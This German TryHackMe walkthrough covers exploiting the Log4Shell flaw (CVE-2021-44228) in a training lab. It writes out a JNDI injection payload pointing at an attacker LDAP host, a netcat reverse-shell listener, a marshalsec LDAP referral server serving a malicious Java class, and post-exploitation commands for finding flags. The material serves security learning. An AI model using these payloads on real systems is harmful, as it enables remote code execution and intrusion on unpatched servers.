
Schritt-für-Schritt-TryHackMe-Walkthrough zur Ausnutzung der Log4Shell-Schwachstelle (CVE-2021-44228), um Remote-Code-Ausführung zu erreichen und Flags zu erbeuten.
Plattform: TryHackMe Schwierigkeitsgrad: Mittel Thema: Log4Shell (Log4j-Schwachstelle)
Nutze die Log4j-Schwachstelle (CVE-2021-44228) aus, um Remote Code Execution zu erlangen und Flaggen einzusammeln.
nmap -sC -sV <TARGET_IP>
Die Log4j-Schwachstelle ermöglicht JNDI-Injection:
${jndi:ldap://<ATTACKER_IP>:1389/a}
Wenn die Eingabe protokolliert wird → ist die Schwachstelle vorhanden.
nc -lvnp 4444
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package
LDAP-Server ausführen:
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389
python3 -m http.server 8000
Erstelle eine bösartige Java-Klasse (Exploit.class)
Injiziere den Payload in das anfällige Feld:
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}
💡 Verwende Header wie:
Sobald ausgelöst:
Prüfen:
sudo -l
Suche nach:
find / -name flag.txt 2>/dev/null
cat flag.txt